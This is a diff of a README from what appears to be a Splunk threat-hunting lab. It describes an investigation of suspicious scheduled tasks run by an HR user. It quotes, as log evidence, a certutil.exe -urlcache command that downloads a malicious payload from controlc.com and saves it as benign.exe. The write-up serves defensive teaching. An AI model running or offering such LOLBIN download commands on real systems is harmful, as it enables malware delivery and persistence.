RyanSalomon/Splunk-Lab/README.md

 From here I observed that the user Chris.fort from the HR department is running schedulded tasks.
 Creating a scheduled task to run an executable from a temporary directory (such as AppData\Local\Temp) can be suspicious, as this is a common technique used by malware to maintain persistence on a system.
 So this could mean that update.exe is an unknown or potentially harmful file.

-Shifting focus to the first suspicious command line instance, I searched for the value certutil.exe -urlcache -f - https://controlc.com/e4d11035 benign.exe.
+Shifting focus to the first suspicious command line instance, I searched for the value certutil.exe -urlcache -f - https ://controlc.com/e4d11035 benign.exe.
 This revealed that the LOLBIN certutil.exe was used to download a malicious payload from the file-sharing host controlc.com.

 Visual: CommandLine logs and details of the certutil.exe activity.